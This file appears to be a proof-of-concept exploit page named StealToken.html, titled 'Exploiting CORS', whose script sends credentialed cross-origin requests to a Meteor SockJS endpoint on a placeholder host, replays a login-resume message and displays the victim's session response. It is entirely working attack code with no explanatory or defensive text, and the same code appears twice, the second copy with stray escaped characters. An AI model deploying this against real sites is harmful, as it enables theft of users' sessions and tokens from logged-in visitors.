andripwn/StealToken.html

## StealToken.html
<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</div>
<script type="text/javascript">
var cont = 0;
     var requests = new Array();
     function ProcessUrls()
     {
         requests = new Array();
         var urls = new Array('http://privatewebsite.com/sockjs/203/jb93ne78/xhr','http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr', 'http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr');
for(i=0;i<urls.length;i++)
         {
             requests.push(new ProcessUrl(urls[i]));
         }
}
function ProcessUrl(url)
     {
            cont+=1;
            if (cont == 2 ){
              var http = new XMLHttpRequest();
              http.open("POST", url, true);
              http.withCredentials = true;
              http.onreadystatechange = function()
            {
                if (http.readyState == 4 && http.status == 204)
                {
                   http.responseText
                }
            };
            http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
            http.send('["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]');
}
else if (cont == 4 ){
              var http = new XMLHttpRequest();
              http.open("POST", url, true);
              http.withCredentials = true;
              http.onreadystatechange = function()
            {
                if (http.readyState == 4 && http.status == 204)
                {
                   http.responseText
                }
            };
            http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
            http.send('["{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"resume\\":\\"abcabcabcabcabcabcabcabcabcabcabcabcabcabca\\"}],\\"id\\":\\"1\\"}","{\\"msg\\":\\"sub\\",\\"id\\":\\"hihihihihihihihi\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"yzyzyzyzyzyzyzyzy\\",\\"name\\":\\"meteor_autoupdate_clientVersions\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"efefefefefefefefe\\",\\"name\\":\\"hooks\\",\\"params\\":[]}"]');
}
else if (cont == 5) {
                var http = new XMLHttpRequest();
                http.open("POST", url, true);
                http.withCredentials = true;
                http.onreadystatechange = function()
            {
                if (http.readyState == 4 && http.status == 200 || http.readyState == 4 && http.status == 204 )
                {
                   alert(http.responseText)
                }
            };
http.send();
            }
else {
                var http = new XMLHttpRequest();
                http.open("POST", url, true);
                http.withCredentials = true;
                http.onreadystatechange = function()
            {
                if (http.readyState == 4 && http.status == 200 || http.readyState == 4 && http.status == 204 )
                {
                   http.responseText
                }
            };
http.send();
            }
     }
</script>
	<!DOCTYPE html>
	<html>
	<head><title>Exploiting CORS</title></head>
	<body>
	<center>
	<h1>Getting your information through CORS</h1>
	<button type="button" onclick="ProcessUrls()">Exploit</button>
	</div>
	<script type="text/javascript">
	var cont = 0;
	var requests = new Array();
	function ProcessUrls()
	{
	requests = new Array();
	var urls = new Array('http://privatewebsite.com/sockjs/203/jb93ne78/xhr','http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr', 'http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr');
	for(i=0;i<urls.length;i++)
	{
	requests.push(new ProcessUrl(urls[i]));
	}
	}
	function ProcessUrl(url)
	{
	cont+=1;
	if (cont == 2 ){
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 204)
	{
	http.responseText
	}
	};
	http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
	http.send('["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]');
	}
	else if (cont == 4 ){
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 204)
	{
	http.responseText
	}
	};
	http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
	http.send('["{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"resume\\":\\"abcabcabcabcabcabcabcabcabcabcabcabcabcabca\\"}],\\"id\\":\\"1\\"}","{\\"msg\\":\\"sub\\",\\"id\\":\\"hihihihihihihihi\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"yzyzyzyzyzyzyzyzy\\",\\"name\\":\\"meteor_autoupdate_clientVersions\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"efefefefefefefefe\\",\\"name\\":\\"hooks\\",\\"params\\":[]}"]');
	}
	else if (cont == 5) {
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 200 \|\| http.readyState == 4 && http.status == 204 )
	{
	alert(http.responseText)
	}
	};
	http.send();
	}
	else {
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 200 \|\| http.readyState == 4 && http.status == 204 )
	{
	http.responseText
	}
	};
	http.send();
	}
	}
	</script>